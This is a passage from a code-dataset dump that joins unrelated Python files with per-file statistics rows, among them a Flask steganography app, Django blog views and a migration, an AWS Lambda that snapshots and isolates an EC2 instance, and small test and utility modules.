except fbuild.ExecutionError:
return False
@platform.auto_platform_options()
def check_link_exe(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_link_exe(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
@platform.auto_platform_options()
def tempfile_run(self, *args, quieter=1, ckwargs={}, lkwargs={}, **kwargs):
with self.tempfile_link_exe(*args,
quieter=quieter,
ckwargs=ckwargs,
**lkwargs) as exe:
return self.ctx.execute([exe],
quieter=quieter,
cwd=exe.parent,
**kwargs)
# ------------------------------------------------------------------------------
class AbstractCompilerBuilder(AbstractLibLinker, AbstractExeLinker):
pass
| 35.762048 | 80 | 0.553609 | 1,326 | 11,873 | 4.831825 | 0.156863 | 0.035898 | 0.037459 | 0.05057 | 0.536288 | 0.482285 | 0.461058 | 0.437334 | 0.418136 | 0.376151 | 0 | 0.000925 | 0.271456 | 11,873 | 331 | 81 | 35.870091 | 0.739769 | 0.166596 | 0 | 0.422594 | 0 | 0 | 0.024862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117155 | false | 0.050209 | 0.046025 | 0.008368 | 0.305439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bec81857d7e4af0801337540f4b978497c5536f9 | 1,897 | py | Python | tuprolog/solve/exception/error/existence/__init__.py | DavideEva/2ppy | 55609415102f8116165a42c8e33e029c4906e160 | [
"Apache-2.0"
] | 1 | 2021-08-07T06:29:28.000Z | 2021-08-07T06:29:28.000Z | tuprolog/solve/exception/error/existence/__init__.py | DavideEva/2ppy | 55609415102f8116165a42c8e33e029c4906e160 | [
"Apache-2.0"
] | 14 | 2021-09-16T13:25:12.000Z | 2022-01-03T10:12:22.000Z | tuprolog/solve/exception/error/existence/__init__.py | DavideEva/2ppy | 55609415102f8116165a42c8e33e029c4906e160 | [
"Apache-2.0"
] | 1 | 2021-12-22T00:25:32.000Z | 2021-12-22T00:25:32.000Z | from typing import Union
from tuprolog import logger
# noinspection PyUnresolvedReferences
import jpype.imports
# noinspection PyUnresolvedReferences
import it.unibo.tuprolog.solve.exception.error as errors
from tuprolog.core import Term, Atom
from tuprolog.solve import ExecutionContext, Signature
ExistenceError = errors.ExistenceError
ObjectType = ExistenceError.ObjectType
OBJECT_PROCEDURE = ObjectType.PROCEDURE
OBJECT_SOURCE_SINK = ObjectType.SOURCE_SINK
OBJECT_RESOURCE = ObjectType.RESOURCE
OBJECT_STREAM = ObjectType.STREAM
OBJECT_OOP_ALIAS = ObjectType.OOP_ALIAS
OBJECT_OOP_METHOD = ObjectType.OOP_METHOD
OBJECT_OOP_CONSTRUCTOR = ObjectType.OOP_CONSTRUCTOR
OBJECT_OOP_PROPERTY = ObjectType.OOP_PROPERTY
def existence_error(
context: ExecutionContext,
type: ObjectType,
culprit: Term,
message: str
) -> ExistenceError:
return ExistenceError.of(context, type, culprit, message)
def existence_error_for_source_sink(
context: ExecutionContext,
alias: Union[Atom, str]
) -> ExistenceError:
return ExistenceError.forSourceSink(context, alias)
def existence_error_for_procedure(
context: ExecutionContext,
procedure: Signature
) -> ExistenceError:
return ExistenceError.forProcedure(context, procedure)
def existence_error_for_stream(
context: ExecutionContext,
stream: Term
) -> ExistenceError:
return ExistenceError.forStream(context, stream)
def existence_error_for_resource(
context: ExecutionContext,
name: str
) -> ExistenceError:
return ExistenceError.forResource(context, name)
def object_type(name: Union[str, Term]) -> ObjectType:
if isinstance(name, str):
return ObjectType.of(name)
else:
return ObjectType.fromTerm(name)
logger.debug("Loaded JVM classes from it.unibo.tuprolog.solve.exception.error.ExistenceError.*")
| 24.960526 | 96 | 0.765946 | 200 | 1,897 | 7.1 | 0.29 | 0.042254 | 0.059859 | 0.056338 | 0.047887 | 0.047887 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163416 | 1,897 | 75 | 97 | 25.293333 | 0.89477 | 0.037428 | 0 | 0.204082 | 0 | 0 | 0.043884 | 0.030719 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122449 | false | 0 | 0.122449 | 0.102041 | 0.387755 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
fe2070ac8557cbd4275cc5e584c79388af700674 | 2,510 | py | Python | detection/contor.py | chika626/chainer_rep | a1d4fd32a8cfcab753269455d08c1918f273388d | [
"MIT"
] | null | null | null | detection/contor.py | chika626/chainer_rep | a1d4fd32a8cfcab753269455d08c1918f273388d | [
"MIT"
] | 7 | 2020-03-13T08:29:46.000Z | 2020-05-27T17:34:14.000Z | detection/contor.py | chika626/chainer_rep | a1d4fd32a8cfcab753269455d08c1918f273388d | [
"MIT"
] | null | null | null | import json
import math
from PIL import Image,ImageDraw
import pandas as pd
import glob
import argparse
import copy
import numpy as np
import matplotlib.pyplot as plt
import pickle
import cv2
from PIL import ImageEnhance
import chainer
from chainer.datasets import ConcatenatedDataset
from chainer.datasets import TransformDataset
from chainer.optimizer_hooks import WeightDecay
from chainer import serializers
from chainer import training
from chainer.training import extensions
from chainer.training import triggers
from chainercv.datasets import voc_bbox_label_names
from chainercv.datasets import VOCBboxDataset
from chainercv.extensions import DetectionVOCEvaluator
from chainercv.links.model.ssd import GradientScaling
from chainercv.links.model.ssd import multibox_loss
from chainercv.links import SSD300
from chainercv.links import SSD512
from chainercv import transforms
from chainercv.utils import read_image
from chainercv.links.model.ssd import random_crop_with_bbox_constraints
from chainercv.links.model.ssd import random_distort
from chainercv.links.model.ssd import resize_with_random_interpolation
import queue
def run(img):
# c , H , W = img.shape
H,W = img.size
img = np.asarray(img)
# 変換後データ配列
transed = Image.new('RGB',(H,W))
for x in range(H):
for y in range(W):
transed.putpixel((x,y),(255,255,255))
for x in range(H):
for y in range(W):
if x + 1 == H or y + 1 == W:
break
if img[y][x][0] != img[y][x+1][0]:
transed.putpixel((x,y),(0,0,0))
for y in range(W):
for x in range(H):
if x + 1 == H or y + 1 == W:
break
if img[y][x][0] != img[y+1][x][0]:
transed.putpixel((x,y),(0,0,0))
return transed
def main():
# # 単一の場合のコード
# img = Image.open('cont/transed/X.jpg')
# img=img.convert('L')
# img=np.asarray(img)
# ret2, img = cv2.threshold(img, 0, 255, cv2.THRESH_OTSU)
# img=Image.fromarray(img)
# img=img.convert('RGB')
# transed = run(img)
# transed.save('transec_0.png')
# return
# 大量変換機
img_path=glob.glob("cont/crop/*")
counter=0
for path in img_path:
img = Image.open(path)
transed = run(img)
transed.save('transec_{}.png'.format(counter))
counter+=1
if __name__ == '__main__':
main() | 26.989247 | 72 | 0.640239 | 348 | 2,510 | 4.54023 | 0.298851 | 0.098734 | 0.079747 | 0.072785 | 0.255063 | 0.248101 | 0.139241 | 0.091139 | 0.064557 | 0.064557 | 0 | 0.022605 | 0.259761 | 2,510 | 93 | 73 | 26.989247 | 0.827772 | 0.114343 | 0 | 0.190476 | 0 | 0 | 0.017005 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031746 | false | 0 | 0.52381 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
fe21f2c89737b3c4d120cba724974597cb079bc4 | 1,675 | py | Python | src/boot.py | johngtrs/krux | 7b6c6d410e29c16ab5d3c05a5aafab618f13a86f | [
"MIT"
] | null | null | null | src/boot.py | johngtrs/krux | 7b6c6d410e29c16ab5d3c05a5aafab618f13a86f | [
"MIT"
] | null | null | null | src/boot.py | johngtrs/krux | 7b6c6d410e29c16ab5d3c05a5aafab618f13a86f | [
"MIT"
] | null | null | null | # The MIT License (MIT)
# Copyright (c) 2021 Tom J. Sun
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import machine
from pmu import axp192
from context import Context
from login import Login
from home import Home
import settings
pmu = axp192()
# Enable power management so that if power button is held down 6 secs,
# it shuts off as expected
pmu.enablePMICSleepMode(True)
ctx = Context()
ctx.display.flash_text(settings.load('splash', ( 'Krux' ), strip=False))
while True:
if not Login(ctx).run():
break
if not Home(ctx).run():
break
ctx.display.flash_text(( 'Shutting down..' ))
ctx.clear()
pmu.setEnterSleepMode()
machine.reset()
| 32.211538 | 79 | 0.755224 | 254 | 1,675 | 4.972441 | 0.543307 | 0.069675 | 0.020586 | 0.030087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007971 | 0.176119 | 1,675 | 51 | 80 | 32.843137 | 0.907246 | 0.696119 | 0 | 0.105263 | 0 | 0 | 0.051125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.315789 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
fe2900b93b3b942d3363b1695eb5a7b3920a90d6 | 1,913 | py | Python | app.py | Nishanth-Gobi/Da-Vinci-Code | b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a | [
"MIT"
] | null | null | null | app.py | Nishanth-Gobi/Da-Vinci-Code | b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a | [
"MIT"
] | null | null | null | app.py | Nishanth-Gobi/Da-Vinci-Code | b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request, redirect, url_for
from os.path import join
from stego import Steganography
app = Flask(__name__)
UPLOAD_FOLDER = 'static/files/'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg'}
@app.route("/")
def home():
return render_template('home.html')
@app.route("/encrypt", methods=['GET', 'POST'])
def get_image():
if request.method == 'GET':
return render_template('encrypt.html')
# Check if the user has entered the secret message
if 'file' in request.files and 'Secret' in request.values:
uploaded_image = request.files['file']
message = request.values.get('Secret')
password = request.values.get("key")
filepath = join(app.config['UPLOAD_FOLDER'], "cover_image.png")
uploaded_image.save(filepath)
im = Steganography(filepath=app.config['UPLOAD_FOLDER'], key=password)
im.encode(message=message)
return render_template('encrypt.html', value=filepath, image_flag=True, secret_flag=True)
return redirect(url_for('encrypt'))
@app.route("/decrypt", methods=['GET', 'POST'])
def get_image_to_decrypt():
if request.method == 'GET':
return render_template('decrypt.html')
if 'key' in request.values:
password = request.values.get('key')
filepath = join(app.config['UPLOAD_FOLDER'], "stego_image.png")
im = Steganography(filepath=app.config['UPLOAD_FOLDER'], key=password)
message = im.decode()
return render_template('decrypt.html', value=filepath, message=message)
if 'file' in request.files:
uploaded_image = request.files['file']
filepath = join(app.config['UPLOAD_FOLDER'], "stego_image.png")
uploaded_image.save(filepath)
return render_template('decrypt.html', value=filepath)
if __name__ == '__main__':
app.run(debug=True)
| 31.360656 | 97 | 0.67747 | 239 | 1,913 | 5.242678 | 0.276151 | 0.076616 | 0.071828 | 0.100559 | 0.579409 | 0.490822 | 0.361532 | 0.230646 | 0.230646 | 0.09577 | 0 | 0 | 0.182436 | 1,913 | 60 | 98 | 31.883333 | 0.801151 | 0.025091 | 0 | 0.243902 | 0 | 0 | 0.163178 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0.097561 | 0.073171 | 0.02439 | 0.317073 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
fe2b48a6665b98787ac1bd205fe634201bd2120e | 1,480 | py | Python | job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py | Sruthi-Ganesh/postgres-django-queue | 4ea8412c073ff8ceb0efbac48afc29456ae11346 | [
"Apache-2.0"
] | null | null | null | job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py | Sruthi-Ganesh/postgres-django-queue | 4ea8412c073ff8ceb0efbac48afc29456ae11346 | [
"Apache-2.0"
] | null | null | null | job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py | Sruthi-Ganesh/postgres-django-queue | 4ea8412c073ff8ceb0efbac48afc29456ae11346 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 2.2.4 on 2019-08-21 19:53
# this file is auto-generated so don't do flake8 on it
# flake8: noqa
from __future__ import absolute_import, unicode_literals
from django.db import migrations, models
import django.utils.timezone
def copy_date_done_to_date_created(apps, schema_editor):
TaskResult = apps.get_model('django_celery_results', 'taskresult')
db_alias = schema_editor.connection.alias
TaskResult.objects.using(db_alias).all().update(
date_created=models.F('date_done')
)
def reverse_copy_date_done_to_date_created(app, schema_editor):
# the reverse of 'copy_date_done_to_date_created' is do nothing
# because the 'date_created' will be removed.
pass
class Migration(migrations.Migration):
dependencies = [
('django_celery_results', '0005_taskresult_worker'),
]
operations = [
migrations.AddField(
model_name='taskresult',
name='date_created',
field=models.DateTimeField(
auto_now_add=True,
db_index=True,
default=django.utils.timezone.now,
help_text='Datetime field when the task result was created in UTC',
verbose_name='Created DateTime'
),
preserve_default=False,
),
migrations.RunPython(copy_date_done_to_date_created,
reverse_copy_date_done_to_date_created),
]
| 30.204082 | 83 | 0.664189 | 183 | 1,480 | 5.065574 | 0.519126 | 0.09493 | 0.064725 | 0.075512 | 0.149946 | 0.149946 | 0.06904 | 0 | 0 | 0 | 0 | 0.019838 | 0.250676 | 1,480 | 48 | 84 | 30.833333 | 0.816051 | 0.161486 | 0 | 0.064516 | 1 | 0 | 0.141815 | 0.051864 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0.032258 | 0.096774 | 0 | 0.258065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe3002f8ab77d8668df51f08f7789bc9628e8c1f | 2,370 | py | Python | EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py | spartantri/aws-security-automation | a3904931220111022d12e71a3d79e4a85fc82173 | [
"Apache-2.0"
] | null | null | null | EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py | spartantri/aws-security-automation | a3904931220111022d12e71a3d79e4a85fc82173 | [
"Apache-2.0"
] | null | null | null | EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py | spartantri/aws-security-automation | a3904931220111022d12e71a3d79e4a85fc82173 | [
"Apache-2.0"
] | null | null | null | # MIT No Attribution
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import boto3
import os
def lambda_handler(event, context):
# TODO implement
print(event)
client = boto3.client('ec2')
instanceID = event.get('instanceID')
response = client.describe_instances(
InstanceIds=[
instanceID
]
)
volumeID = response['Reservations'][0]['Instances'][0]['BlockDeviceMappings'][0]['Ebs']['VolumeId']
print(volumeID)
SnapShotDetails = client.create_snapshot(
Description='Isolated Instance',
VolumeId=volumeID
)
client.create_tags(Resources=[SnapShotDetails['SnapshotId']], Tags=[{'Key': 'Name', 'Value': instanceID}])
# TODO Dump Response into S3 - response
# TODO Dump Response details into Snapshot - SnapShotDetails['SnapshotId']
print(response)
print(SnapShotDetails['SnapshotId'])
response = client.modify_instance_attribute(
Groups=[
os.environ['ISOLATED_SECUTRITYGROUP'],
],
InstanceId=instanceID
)
tagresponse = client.create_tags(
Resources=[
instanceID,
],
Tags=[
{
'Key': 'IsIsolated',
'Value': 'InstanceIsolated'
},
]
)
waiter = client.get_waiter('snapshot_completed')
waiter.wait(
SnapshotIds=[
SnapShotDetails['SnapshotId'],
]
)
# event['SnapshotId'] = SnapShotDetails['SnapshotId']
return SnapShotDetails['SnapshotId']
| 33.857143 | 110 | 0.670042 | 261 | 2,370 | 6.045977 | 0.521073 | 0.048796 | 0.016477 | 0.031686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00387 | 0.236709 | 2,370 | 69 | 111 | 34.347826 | 0.868436 | 0.444726 | 0 | 0.045455 | 0 | 0 | 0.160123 | 0.017706 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.022727 | false | 0 | 0.045455 | 0 | 0.090909 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe317187c1c12b8c77ea5e51802f388e760744e4 | 1,324 | py | Python | tests/test_intbounds.py | alex/optimizer-model | 0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98 | [
"BSD-3-Clause"
] | 4 | 2015-04-29T22:49:25.000Z | 2018-02-16T09:06:08.000Z | tests/test_intbounds.py | alex/optimizer-model | 0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98 | [
"BSD-3-Clause"
] | null | null | null | tests/test_intbounds.py | alex/optimizer-model | 0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98 | [
"BSD-3-Clause"
] | null | null | null | from optimizer.utils.intbounds import IntBounds
class TestIntBounds(object):
def test_make_gt(self):
i0 = IntBounds()
i1 = i0.make_gt(IntBounds(10, 10))
assert i1.lower == 11
def test_make_gt_already_bounded(self):
i0 = IntBounds()
i1 = i0.make_gt(IntBounds(10, 10)).make_gt(IntBounds(0, 0))
assert i1.lower == 11
def test_make_lt(self):
i0 = IntBounds()
i1 = i0.make_lt(IntBounds(10, 10))
assert i1.upper == 9
def test_make_lt_already_bounded(self):
i0 = IntBounds()
i1 = i0.make_lt(IntBounds(0, 0)).make_lt(IntBounds(10, 10))
assert i1.upper == -1
def test_both_bounds(self):
i0 = IntBounds()
i1 = i0.make_lt(IntBounds(10, 10)).make_gt(IntBounds(0, 0))
assert i1.upper == 9
assert i1.lower == 1
i2 = i0.make_gt(IntBounds(0, 0)).make_lt(IntBounds(10, 10))
assert i2.lower == 1
assert i2.upper == 9
def test_make_le_already_bounded(self):
i0 = IntBounds()
i1 = i0.make_le(IntBounds(0, 0)).make_le(IntBounds(2, 2))
assert i1.upper == 0
def test_make_ge_already_bounded(self):
i0 = IntBounds()
i1 = i0.make_ge(IntBounds(10, 10)).make_ge(IntBounds(0, 0))
assert i1.lower == 10
| 23.22807 | 67 | 0.5929 | 192 | 1,324 | 3.901042 | 0.166667 | 0.064085 | 0.140187 | 0.158879 | 0.699599 | 0.65287 | 0.620828 | 0.562083 | 0.365821 | 0.269693 | 0 | 0.092147 | 0.278701 | 1,324 | 56 | 68 | 23.642857 | 0.692147 | 0 | 0 | 0.323529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.294118 | 1 | 0.205882 | false | 0 | 0.029412 | 0 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe32cc9e555895354fe2279db255494d9b4433fb | 1,652 | py | Python | address_book/address_book.py | wowsuchnamaste/address_book | 4877d16d795c54b750e151fa93e69c080717ae72 | [
"MIT"
] | null | null | null | address_book/address_book.py | wowsuchnamaste/address_book | 4877d16d795c54b750e151fa93e69c080717ae72 | [
"MIT"
] | null | null | null | address_book/address_book.py | wowsuchnamaste/address_book | 4877d16d795c54b750e151fa93e69c080717ae72 | [
"MIT"
] | null | null | null | """A simple address book."""
from ._tools import generate_uuid
class AddressBook:
"""
A simple address book.
"""
def __init__(self):
self._entries = []
def add_entry(self, entry):
"""Add an entry to the address book."""
self._entries.append(entry)
def get_entries(self):
"""Returns a list of all entries in the address book.
:return: ``list`` of ``Person`` objects.
"""
return self._entries
def get_entry(self, name):
entry = [entry for entry in self._entries if entry.name == name]
return entry[0]
class Entry:
def __init__(
self,
name,
first_name=None,
last_name=None,
address=None,
phone_number=None,
email=None,
organization=None,
):
self._uuid = generate_uuid()
self.name = name
self.first_name = first_name
self.last_name = last_name
self._parse_name(name)
self.address = address
self.phone_number = phone_number
self.email = email
self.organization = organization
def __repr__(self):
return self.name
def _parse_name(self, name):
"""
Parse whatever is passed as ``name`` and update ``self.name`` from that.
:param name: A person's name as string or dictionary.
:return: The method doesn't return anything.
"""
if type(name) == dict:
self.first_name = name["first_name"]
self.last_name = name["last_name"]
self.name = self.first_name + " " + self.last_name
| 25.415385 | 80 | 0.565981 | 197 | 1,652 | 4.532995 | 0.309645 | 0.080627 | 0.043673 | 0.057111 | 0.079507 | 0.055991 | 0 | 0 | 0 | 0 | 0 | 0.000906 | 0.331719 | 1,652 | 64 | 81 | 25.8125 | 0.807971 | 0.208838 | 0 | 0 | 1 | 0 | 0.016393 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.184211 | false | 0 | 0.026316 | 0.026316 | 0.342105 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe358e9590f17c8d7c10eb92232dc2f7d4b20167 | 235 | py | Python | config.py | volgachen/Chinese-Tokenization | 467e08da6fe271b6e33258d5aa6682c0405a3f32 | [
"Apache-2.0"
] | null | null | null | config.py | volgachen/Chinese-Tokenization | 467e08da6fe271b6e33258d5aa6682c0405a3f32 | [
"Apache-2.0"
] | null | null | null | config.py | volgachen/Chinese-Tokenization | 467e08da6fe271b6e33258d5aa6682c0405a3f32 | [
"Apache-2.0"
] | 1 | 2020-07-12T10:38:34.000Z | 2020-07-12T10:38:34.000Z | class Config:
ngram = 2
train_set = "data/rmrb.txt"
modified_train_set = "data/rmrb_modified.txt"
test_set = ""
model_file = ""
param_file = ""
word_max_len = 10
proposals_keep_ratio = 1.0
use_re = 1
subseq_num = 15 | 21.363636 | 47 | 0.67234 | 37 | 235 | 3.918919 | 0.756757 | 0.110345 | 0.165517 | 0.22069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0.217021 | 235 | 11 | 48 | 21.363636 | 0.744565 | 0 | 0 | 0 | 0 | 0 | 0.154867 | 0.097345 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe3845f60103709c0d0030d388891565874650ad | 1,076 | py | Python | blogtech/src/blog/views.py | IVAN-URBACZKA/django-blog | 7ef6050c0de2938791843c3ec93e6e6a1e683baa | [
"MIT"
] | null | null | null | blogtech/src/blog/views.py | IVAN-URBACZKA/django-blog | 7ef6050c0de2938791843c3ec93e6e6a1e683baa | [
"MIT"
] | null | null | null | blogtech/src/blog/views.py | IVAN-URBACZKA/django-blog | 7ef6050c0de2938791843c3ec93e6e6a1e683baa | [
"MIT"
] | null | null | null | from django.urls import reverse_lazy, reverse
from django.utils.decorators import method_decorator
from django.views.generic import ListView, DetailView, CreateView, DeleteView, UpdateView
from .models import BlogPost
from django.contrib.auth.decorators import login_required
class BlogPostHomeView(ListView):
model = BlogPost
context_object_name = "posts"
class BlogPostDetailsView(DetailView):
model = BlogPost
context_object_name = "post"
@method_decorator(login_required, name='dispatch')
class BlogPostCreateView(CreateView):
model = BlogPost
fields = ['title', 'image','author', 'category', 'content']
def get_success_url(self):
return reverse('posts:home')
@method_decorator(login_required, name='dispatch')
class BlogPostUpdateView(UpdateView):
model = BlogPost
fields = ['title', 'author', 'category', 'content']
template_name = 'blog/blogpost_update.html'
@method_decorator(login_required, name='dispatch')
class BlogPostDeleteView(DeleteView):
model = BlogPost
success_url = reverse_lazy('posts:home') | 31.647059 | 89 | 0.760223 | 119 | 1,076 | 6.714286 | 0.445378 | 0.081352 | 0.075094 | 0.105131 | 0.244055 | 0.168961 | 0.168961 | 0 | 0 | 0 | 0 | 0 | 0.136617 | 1,076 | 34 | 90 | 31.647059 | 0.860065 | 0 | 0 | 0.307692 | 0 | 0 | 0.125348 | 0.023213 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.192308 | 0.038462 | 0.884615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
fe393898f4084fe1c0d82dbb19e8e9bf170a60ea | 4,514 | py | Python | apc_deep_vision/python/generate_data.py | Juxi/apb-baseline | fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce | [
"BSD-3-Clause"
] | 9 | 2017-02-06T10:24:56.000Z | 2022-02-27T20:59:52.000Z | apc_deep_vision/python/generate_data.py | Juxi/apb-baseline | fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce | [
"BSD-3-Clause"
] | null | null | null | apc_deep_vision/python/generate_data.py | Juxi/apb-baseline | fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce | [
"BSD-3-Clause"
] | 2 | 2017-10-15T08:33:37.000Z | 2019-03-05T07:29:38.000Z | #! /usr/bin/env python
# ********************************************************************
# Software License Agreement (BSD License)
#
# Copyright (c) 2015, University of Colorado, Boulder
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the University of Colorado Boulder
# nor the names of its contributors may be
# used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
